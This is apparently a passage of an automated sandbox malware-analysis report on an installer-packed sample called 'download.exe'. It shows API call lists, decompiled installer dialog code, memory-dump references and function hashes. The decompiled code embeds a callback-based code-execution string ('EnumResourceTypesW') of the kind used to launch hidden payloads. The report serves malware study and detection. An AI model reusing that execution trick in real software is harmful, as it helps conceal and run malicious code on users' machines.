                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404ACE
                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AE0
                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 00404AF6
                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B02
                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B14
                                                      • DeleteObject.GDI32(00000000), ref: 00404B17
                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B42
                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B4E
                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BE3
                                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C0E
                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C22
                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404C51
                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C5F
                                                      • ShowWindow.USER32(?,00000005), ref: 00404C70
                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D6D
                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DD2
                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DE7
                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E0B
                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E2B
                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404E40
                                                      • GlobalFree.KERNEL32(?), ref: 00404E50
                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EC9
                                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404F72
                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F81
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404FA1
                                                      • ShowWindow.USER32(?,00000000), ref: 00404FEF
                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404FFA
                                                      • ShowWindow.USER32(00000000), ref: 00405001
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $M$N
                                                      • API String ID: 1638840714-813528018
                                                      • Opcode ID: 172e59c7ba931a394c3fba9a3879f403beeb7489b9f7cd5918fdae017d576325
                                                      • Instruction ID: 95fc731ee8c2f60e707b2e347886eca1b13b95ad12058a055eb87ebce7bf2e6a
                                                      • Opcode Fuzzy Hash: 172e59c7ba931a394c3fba9a3879f403beeb7489b9f7cd5918fdae017d576325
                                                      • Instruction Fuzzy Hash: 720270B0900209EFEB149F58DD85AAE7BB5FB84315F10813AF610BA2E1D7789D52CF58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A323B2 Relevance: 27.9, Strings: 22, Instructions: 405COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====
                                                      • API String ID: 0-3896120644
                                                      • Opcode ID: d9b641fc5660a61744befb0080907e735077113c026126cef0d934b954e8bcc4
                                                      • Instruction ID: 3f213e597d5967bf21a8d4cfa9f13e992bac1e882ecbde2c2810964cd0658294
                                                      • Opcode Fuzzy Hash: d9b641fc5660a61744befb0080907e735077113c026126cef0d934b954e8bcc4
                                                      • Instruction Fuzzy Hash: E0817873F2E701C9FB932460C5413F557B0CF2A593E21CBA1B827A1565B62F7A4E3A80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004044AE Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E004044AE(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x79ed18; // 0xae4f0c
				_v32 = _t82;
				_t2 = _t82 + 0x3c; // 0x0
				_t3 = _t82 + 0x38; // 0x0
				_t146 = ( *_t2 << 0xa) + "kernel32::EnumResourceTypesW(i 0,i r1,i 0)";
				_v12 =  *_t3;
				if(_a8 == 0x40b) {
					E0040567D(0x3fb, _t146);
					E004061E7(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040567D(0x3fb, _t146);
							if(E00405A03(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405F7D(0x79e510, _t146);
							_t87 = E00406315(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405F7D(0x79e510, _t146);
								_t89 = E004059AE(0x79e510);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x79e510,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79e510) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79e510,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E0040595C(0x79e510);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x79e510) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404942(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x7a271c; // 0xaea04d
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040492A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x79e500);
									} else {
										E00404865(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a3004 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E0040403E(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x79f530 == _t158) {
									E00404407();
								}
								 *0x79f530 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x79f540;
							_v60 = E004047FF;
							_v56 = _t146;
							_v68 = E00405F9F(_t146, 0x79f540, _t166, 0x79e918, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405915(_t146);
								_t124 =  *0x7a2f54; // 0xae4de0
								_t26 = _t124 + 0x11c; // 0x4e
								_t125 =  *_t26;
								if( *_t26 != 0 && _t146 == "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize") {
									E00405F9F(_t146, 0x79f540, _t166, 0, _t125);
									if(lstrcmpiA(0x7a1ee0, 0x79f540) != 0) {
										lstrcatA(_t146, 0x7a1ee0);
									}
								}
								 *0x79f530 =  *0x79f530 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405982(_t146) != 0 && E004059AE(_t146) == 0) {
						E00405915(_t146);
					}
					 *0x7a2718 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E0040401C(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E0040401C(_t166);
					E00404051(_t165);
					_t138 = E00406315(7);
					if(_t138 == 0) {
						L53:
						return E00404083(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}















































                                                      0x004044ae
                                                      0x004044b4
                                                      0x004044ba
                                                      0x004044be
                                                      0x004044c1
                                                      0x004044c7
                                                      0x004044d5
                                                      0x004044d8
                                                      0x004044e0
                                                      0x004044e6
                                                      0x004044e6
                                                      0x004044f2
                                                      0x004044f5
                                                      0x00404563
                                                      0x0040456a
                                                      0x00404641
                                                      0x00404648
                                                      0x00404657
                                                      0x00404657
                                                      0x0040465b
                                                      0x00404665
                                                      0x00404672
                                                      0x00404674
                                                      0x00404674
                                                      0x00404682
                                                      0x00404689
                                                      0x00404690
                                                      0x00404693
                                                      0x004046ca
                                                      0x004046cc
                                                      0x004046d2
                                                      0x004046d7
                                                      0x004046db
                                                      0x004046dd
                                                      0x004046dd
                                                      0x004046f9
                                                      0x00000000
                                                      0x004046fb
                                                      0x004046fe
                                                      0x0040470c
                                                      0x00404712
                                                      0x00404713
                                                      0x00404716
                                                      0x00404719
                                                      0x00000000
                                                      0x00404719
                                                      0x00404695
                                                      0x00404697
                                                      0x0040469b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040469d
                                                      0x0040469d
                                                      0x004046aa
                                                      0x004046af
                                                      0x00000000
                                                      0x00000000
                                                      0x004046b3
                                                      0x004046b5
                                                      0x004046b5
                                                      0x004046bd
                                                      0x004046bf
                                                      0x004046c2
                                                      0x004046c5
                                                      0x004046c8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004046c8
                                                      0x00404725
                                                      0x0040472f
                                                      0x00404732
                                                      0x00404735
                                                      0x0040473c
                                                      0x0040473c
                                                      0x0040473e
                                                      0x0040473e
                                                      0x00404743
                                                      0x00404745
                                                      0x0040474d
                                                      0x00404754
                                                      0x00404756
                                                      0x00404761
                                                      0x00404761
                                                      0x00404756
                                                      0x00404768
                                                      0x00404771
                                                      0x0040477b
                                                      0x00404783
                                                      0x0040479e
                                                      0x00404785
                                                      0x0040478e
                                                      0x0040478e
                                                      0x00404783
                                                      0x004047a3
                                                      0x004047a8
                                                      0x004047ad
                                                      0x004047b6
                                                      0x004047b6
                                                      0x004047bf
                                                      0x004047c1
                                                      0x004047c1
                                                      0x004047cd
                                                      0x004047d5
                                                      0x004047df
                                                      0x004047df
                                                      0x004047e4
                                                      0x00000000
                                                      0x004047e4
                                                      0x00404693
                                                      0x0040464a
                                                      0x00404651
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00404651
                                                      0x00404570
                                                      0x00404579
                                                      0x00404593
                                                      0x00404598
                                                      0x004045a2
                                                      0x004045a9
                                                      0x004045b5
                                                      0x004045b8
                                                      0x004045bb
                                                      0x004045c2
                                                      0x004045ca
                                                      0x004045cd
                                                      0x004045d1
                                                      0x004045d8
                                                      0x004045e0
                                                      0x0040463a
                                                      0x004045e2
                                                      0x004045e3
                                                      0x004045ea
                                                      0x004045ef
                                                      0x004045f4
                                                      0x004045f4
                                                      0x004045fc
                                                      0x00404609
                                                      0x0040461d
                                                      0x00404621
                                                      0x00404621
                                                      0x0040461d
                                                      0x00404626
                                                      0x00404633
                                                      0x00404633
                                                      0x004045e0
                                                      0x00000000
                                                      0x00404598
                                                      0x00404586
                                                      0x00000000
                                                      0x00000000
                                                      0x0040458c
                                                      0x00000000
                                                      0x004044f7
                                                      0x00404504
                                                      0x0040450d
                                                      0x0040451a
                                                      0x0040451a
                                                      0x00404521
                                                      0x00404527
                                                      0x00404530
                                                      0x00404533
                                                      0x00404536
                                                      0x0040453e
                                                      0x00404541
                                                      0x00404544
                                                      0x0040454a
                                                      0x00404551
                                                      0x00404558
                                                      0x004047ea
                                                      0x004047fc
                                                      0x0040455e
                                                      0x00404561
                                                      0x00000000
                                                      0x00404561
                                                      0x00404558

                                                      APIs
                                                      • GetDlgItem.USER32(?,000003FB), ref: 004044FD
                                                      • SetWindowTextA.USER32(00000000,-007A4000), ref: 00404527
                                                      • SHBrowseForFolderA.SHELL32(?,0079E918,?), ref: 004045D8
                                                      • CoTaskMemFree.OLE32(00000000), ref: 004045E3
                                                      • lstrcmpiA.KERNEL32(Call,0079F540), ref: 00404615
                                                      • lstrcatA.KERNEL32(-007A4000,Call), ref: 00404621
                                                      • SetDlgItemTextA.USER32(?,000003FB,-007A4000), ref: 00404633
                                                        • Part of subcall function 0040567D: GetDlgItemTextA.USER32(?,?,00000400,0040466A), ref: 00405690
                                                        • Part of subcall function 004061E7: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\download.exe",75A63410,C:\Users\user\AppData\Local\Temp\,00000000,004031C4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 0040623F
                                                        • Part of subcall function 004061E7: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040624C
                                                        • Part of subcall function 004061E7: CharNextA.USER32(?,"C:\Users\user\Desktop\download.exe",75A63410,C:\Users\user\AppData\Local\Temp\,00000000,004031C4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 00406251
                                                        • Part of subcall function 004061E7: CharPrevA.USER32(?,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000,004031C4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 00406261
                                                      • GetDiskFreeSpaceA.KERNEL32(0079E510,?,?,0000040F,?,0079E510,0079E510,-007A4000,00000001,0079E510,-007A4000,-007A4000,000003FB,-007A4000), ref: 004046F1
                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040470C
                                                        • Part of subcall function 00404865: lstrlenA.KERNEL32(0079F540,0079F540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404780,000000DF,00000000,00000400,-007A4000), ref: 00404903
                                                        • Part of subcall function 00404865: wsprintfA.USER32 ref: 0040490B
                                                        • Part of subcall function 00404865: SetDlgItemTextA.USER32(?,0079F540), ref: 0040491E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize$Call$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                                      • API String ID: 2624150263-9343340
                                                      • Opcode ID: 835ebef96d9a185249aca47752db4aea3ea54f97fa15e05f5d6c04df71dbffb3
                                                      • Instruction ID: c3220bc8085252b6637529823acfaab3e79984cbb1e105c0cbc22f2c5a0eab13
                                                      • Opcode Fuzzy Hash: 835ebef96d9a185249aca47752db4aea3ea54f97fa15e05f5d6c04df71dbffb3
                                                      • Instruction Fuzzy Hash: 61A171B1900209ABDB11EFA6CD45AAFB7B8EF85314F10443BF601B72D1D77C8A418B69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A3116E Relevance: .7, Instructions: 679COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d9c00008dee22138cd6c4d5bc446fa872936aa3ecf945ad87215f6f36c07e8c
                                                      • Instruction ID: cea1e4cdf467b6dcaf8aff923fcf5912389094e4882551f193cb750d0739731c
                                                      • Opcode Fuzzy Hash: 4d9c00008dee22138cd6c4d5bc446fa872936aa3ecf945ad87215f6f36c07e8c
                                                      • Instruction Fuzzy Hash: 5EC17973F2E305D9FB932470C5913F55770CF2A283E20CB95B827A1565762F3A4A3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A3123F Relevance: .7, Instructions: 672COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 61344d7fea5c439082419c6f2a74d925c58da1ceac8ad4155d372c7bab88870e
                                                      • Instruction ID: d8d84c9bd3c4d799b2d8403974d95b85d4e81631ddd63abf8665e03be0e136e2
                                                      • Opcode Fuzzy Hash: 61344d7fea5c439082419c6f2a74d925c58da1ceac8ad4155d372c7bab88870e
                                                      • Instruction Fuzzy Hash: F0C169B3F2E305D9FB932070C5913F557B0CF2A583E208B95B827A1565762F7A4E3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A31336 Relevance: .7, Instructions: 671COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: df528665b8c4db4a965d8d1605a64351b17a2074a9b619c4b430dfb686fae414
                                                      • Instruction ID: 596752b29b10579fcb3b3aa8ddd2fbbedad31662a336b32cbf7382f4d707a081
                                                      • Opcode Fuzzy Hash: df528665b8c4db4a965d8d1605a64351b17a2074a9b619c4b430dfb686fae414
                                                      • Instruction Fuzzy Hash: 19C168B3F2E305D9FB932470C5813F65770CF2A183E208B95B827A1565762F7A4E3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A320AE Relevance: .7, Instructions: 662COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5c5c2644181e08b1b4d85027c82927daeb7908c738bd9f49c6241f6ec91eb877
                                                      • Instruction ID: f13f44576e4047b67214b68deaf2a34d629b084b1f95056fef400c985f180e07
                                                      • Opcode Fuzzy Hash: 5c5c2644181e08b1b4d85027c82927daeb7908c738bd9f49c6241f6ec91eb877
                                                      • Instruction Fuzzy Hash: BAA19A73F3F301D9FB9720A1C6453A55672CF26383E208FD1BA2761175763A7E4A2688
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A3143B Relevance: .6, Instructions: 613COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 80843c392357fba64dc236957ab429dfad0d2340e23e4fcd4c2b65d590357f25
                                                      • Instruction ID: feac747e25efdddd6bbc43543f13c93bb5e6ae0b6f15fa7495d6db37ba427b6b
                                                      • Opcode Fuzzy Hash: 80843c392357fba64dc236957ab429dfad0d2340e23e4fcd4c2b65d590357f25
                                                      • Instruction Fuzzy Hash: C7B168B3F2E305D9FB932470C5813F557B0CF2A183E20CB95B82BA1565762F7A4A3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A30E44 Relevance: .6, Instructions: 604COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f3cfaf1768105aae80787b431a3aab2b3dc8341f6f961463c45b6c5e481c21c1
                                                      • Instruction ID: 3e49c56d6621cc703e77ad1028bbe640dcd81efd1c78f3f8fc520e54af00b5bc
                                                      • Opcode Fuzzy Hash: f3cfaf1768105aae80787b431a3aab2b3dc8341f6f961463c45b6c5e481c21c1
                                                      • Instruction Fuzzy Hash: E0D15873F2E305D9FB932070C5913F55770CF2A183E218B96B827A1565762F7A4E3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A312DA Relevance: .6, Instructions: 601COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1a0ab5952f16e6a71e1ec33f0b82b7ef61993f6ad67f2003ae0903e3fb90b5b2
                                                      • Instruction ID: c1f03e6c4f91a12d7c0f89ff44202784554e3e39ce59adb0e818f17efd94d1bb
                                                      • Opcode Fuzzy Hash: 1a0ab5952f16e6a71e1ec33f0b82b7ef61993f6ad67f2003ae0903e3fb90b5b2
                                                      • Instruction Fuzzy Hash: 8DC167B3F2E305D9FB932070C5913F65770CF2A183E208B96B827A1565762F7A4E3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A316B3 Relevance: .6, Instructions: 581COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f103f2786bb21ca52007c8313afdff6b12e1096f8ef5e0a86c0c4a4d5104731
                                                      • Instruction ID: fda7e6285a895eae4c66f3fd79f5d8be7d5fab10c14c7207cccc4d2b3573f09f
                                                      • Opcode Fuzzy Hash: 0f103f2786bb21ca52007c8313afdff6b12e1096f8ef5e0a86c0c4a4d5104731
                                                      • Instruction Fuzzy Hash: 85B17973F2E305C9FB932070C5913F55770CF2A193E20CB95B827A15657A2F3A4A3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A31C75 Relevance: .6, Instructions: 580COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6efbfc11eb35711bf5663a1e2a1a02a5d194f30692b3c7f7f5db7c3a8f8c00d4
                                                      • Instruction ID: 57f2408f5fd69c33713718fefb785f061e80ab083659382328e4ac0fa3898802
                                                      • Opcode Fuzzy Hash: 6efbfc11eb35711bf5663a1e2a1a02a5d194f30692b3c7f7f5db7c3a8f8c00d4
                                                      • Instruction Fuzzy Hash: 57917973F2E301C9FB932470C5813F55770CF2A593E20CBA6B827A1565B62E7A4A3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A3153A Relevance: .6, Instructions: 577COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8b65262e1fe567019b534cdf5cc46da98ab51028d0cfcb3e706c7695cc34ca45
